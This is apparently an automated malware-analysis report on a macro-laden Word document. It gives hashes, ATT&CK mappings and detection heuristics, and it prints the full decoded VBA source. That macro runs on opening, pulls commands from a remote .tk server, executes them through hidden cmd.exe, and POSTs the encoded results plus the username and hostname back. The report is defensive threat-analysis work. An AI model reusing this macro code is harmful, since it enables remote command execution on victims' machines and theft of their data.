Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 06989fa099ae5256…

MALICIOUS

Office (OLE)

48.0 KB Created: 2018-05-14 16:51:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: ec440b034e249418a7978dea8658bf9e SHA-1: a8980b38e45dda4cee595b94e78e6d70d02ce92b SHA-256: 06989fa099ae5256e541ae433c998bc9c25b378d4e0d9252f6d4b310a3fed7e1
350 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute a Document_Open subroutine. This subroutine calls a function that uses WScript.Shell to run 'cmd /c' with a command that downloads a file from 'http://wqopsakl.tk/images/error_image_e5bf.png'. The use of Shell() and WScript.Shell, along with cmd.exe references, indicates a high likelihood of payload execution. The embedded URL is the primary indicator of a malicious download attempt.

Heuristics 10

  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Function getName()
    Set wshShell = CreateObject("WScript.Shell")
    getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Function getName()
    Set wshShell = CreateObject("WScript.Shell")
    getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Function getName()
    Set wshShell = CreateObject("WScript.Shell")
    getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
        objTempFile = objName
    objShell.Run "cmd /c " + form_input + " > " + objTempFile, 0, True
    If objFSO.FileExists(objTempFile) Then
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Dim AnyFailure As Boolean
Sub Document_Open()
   On Error GoTo top_error
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://wqopsakl.tk/images/error_image_e5bf.png In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6384 bytes
SHA-256: 0ab3aaee1425cd99d1a5e99b7b4ee652af4d4a233af46fcdbb2180fc84633853
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim AnyFailure As Boolean
Sub Document_Open()
   On Error GoTo top_error
   AnyFailure = False
   If (IsW() = True) Then
       Call getImage
   End If
top_error:
End Sub
Function IsW() As Boolean
#If Win64 Then
    IsW = True
#ElseIf Win32 Then
    IsW = True
#Else
    IsW = False
#End If
End Function
Function getName()
    Set wshShell = CreateObject("WScript.Shell")
    getName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
End Function
Function getFormData(form_input)
    form_input = Replace(form_input, vbCr, "")
    form_input = Replace(form_input, vbLf, "")
    Set objShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    tfolder = objFSO.GetSpecialFolder(TemporaryFolder)
    objName = objFSO.GetTempName
    objTempFile = objName
    objShell.Run "cmd /c " + form_input + " > " + objTempFile, 0, True
    If objFSO.FileExists(objTempFile) Then
        strText = vbCrLf + form_input + vbCrLf + "OUTPUT: " + vbCrLf
        Dim objStream
        Dim strData As String
        Set objStream = CreateObject("ADODB.Stream")
        objStream.Charset = "utf-8"
        objStream.Open
        objStream.LoadFromFile (objTempFile)
        strData = objStream.ReadText()
        strData = cleanLine(strData)
        strText = strText + strData + vbCrLf
        getFormData = strText
        objStream.Close
        objFSO.DeleteFile (objTempFile)
    Else
        getFormData = "Unable to read data"
        AnyFailure = True
    End If
End Function
Function cleanStr(dStr As String)
    Dim iSpCnt As Integer
    Dim AsciiVal As Integer
    iSpCnt = 0
    tempWord = ""
    For iSpCnt = 0 To Len(dStr) - 1
        AsciiVal = Asc(Mid$(dStr, iSpCnt + 1, 1))
        If (AsciiVal > 32 And AsciiVal < 127) Then
             tempWord = tempWord + Mid$(dStr, iSpCnt + 1, 1)
        End If
    Next iSpCnt
    cleanStr = tempWord
End Function

Function cleanLine(dStr As String)
    Dim iSpCnt As Integer
    Dim AsciiVal As Integer
    iSpCnt = 0
    tempWord = ""
    Dim dStrBytes() As Byte
    dStrBytes = dStr
    For iSpCnt = 0 To LenB(dStr) - 1
        CheckVal = dStrBytes(iSpCnt)
        If (CheckVal > 31 And CheckVal < 127) Then
            tempWord = tempWord + Chr(CheckVal)
        ElseIf (CheckVal = 13) Then
            tempWord = tempWord + vbCr
        ElseIf (CheckVal = 10) Then
            tempWord = tempWord + vbLf
        End If
    Next iSpCnt
    cleanLine = tempWord
End Function
Function mdecode(strData As String) As Variant
    Dim objXML As MSXML2.DomDocument60
    Dim objNode As MSXML2.IXMLDOMElement
    Set objXML = New MSXML2.DomDocument60
    Set objNode = objXML.createElement("b64")
    objNode.DataType = "bin.base64"
    objNode.Text = strData
    mdecode = objNode.nodeTypedValue
    Set objNode = Nothing
    Set objXML = Nothing
End Function
Function mencode(strData() As Byte) As String
    Dim objXML As MSXML2.DomDocument60
    Dim objNode As MSXML2.IXMLDOMElement
    Set objXML = New MSXML2.DomDocument60
    Set objNode = objXML.createElement("Base64Data")
    objNode.DataType = "bin.base64"
    objNode.nodeTypedValue = strData
    mencode = objNode.Text
    Set objNode = Nothing
    Set objXML = Nothing
End Function
Function getHN()
    Set wshNetwork = CreateObject("WScript.Network")
    getHN = wshNetwork.ComputerName
End Function
Sub getImage()
    Dim bArray() As Byte
    Dim carray() As String
    Dim cstring As String
    Dim clist As String
    Dim clc As String
    Dim co As String
    Dim WinHttpReq As Object
    Dim bstr As String
    Dim mg As String
    Dim tempStr1 As String
    On Error GoTo error
    tempStr1 = "wqopsakl"
    bstr = ""
    mg = "http://" & tempStr1 & ".tk/forms/forms_0228.php"
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    WinHttpReq.Option(4) = 13056
    WinHttpReq.SetTimeouts 10000, 10000, 10000, 10000
    WinHttpReq.Open "GET", mg, False
    WinHttpReq.send
    bstr = WinHttpReq.responseText
    cstring = cleanStr(bstr)
    If (cstring <> "") Then
        bArray = mdecode(cstring)
        clist = StrConv(bArray, vbUnicode)
        carray = Split(clist, ",")
        co = "USERNAME: " + getName + vbCrLf + "HOSTNAME: " + getHN + vbCrLf
        For Each c In carray
            Dim tempOut
            tempOut = getFormData(c)
            co = co + "COMMAND: " + vbCrLf + tempOut
        Next
        Dim ce As String
        Dim cob() As Byte
        cob = co
        ce = mencode(cob)
        mp = mg
        Dim WinHttpPost As Object
        Set WinHttpPost = CreateObject("WinHttp.WinHttpRequest.5.1")
        WinHttpPost.Option(4) = 13056
        WinHttpPost.SetTimeouts 10000, 10000, 10000, 10000
        WinHttpPost.Open "POST", mp, False
        WinHttpPost.send (ce)
    End If
    If AnyFailure = False Then
        Call getImageFinal
    End If
error:
End Sub
Sub replaceImage()
    Dim tempStr1 As String
    tempStr1 = "wqopsakl"
    Dim img As InlineShape
    Dim simg As Shape
    Dim newimg As InlineShape
    For Each simg In ActiveDocument.Shapes
        If simg.AlternativeText = "warning_image" Then
            simg.Select
            simg.Delete
        End If
    Next
        
    For Each img In ActiveDocument.InlineShapes
        If img.AlternativeText = "warning_image" Then
            img.Select
            img.Delete
        End If
        
        If img.AlternativeText = "error_image" Then
           img.Select
           img.Delete
           Set newimg = Selection.InlineShapes.AddPicture(FileName:="http://" & tempStr1 & ".tk/images/image1_2ce8.jpeg", LinkToFile:=True, SaveWithDocument:=False)
           newimg.Height = 490
           newimg.Width = 306
        End If
    Next
End Sub
Sub getImageLast()
    ActiveWindow.View.ReadingLayout = False
    Call replaceImage
End Sub
Sub getImageFinal()
    Application.OnTime When:=Now + TimeValue("00:00:01"), Name:="getImageLast"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.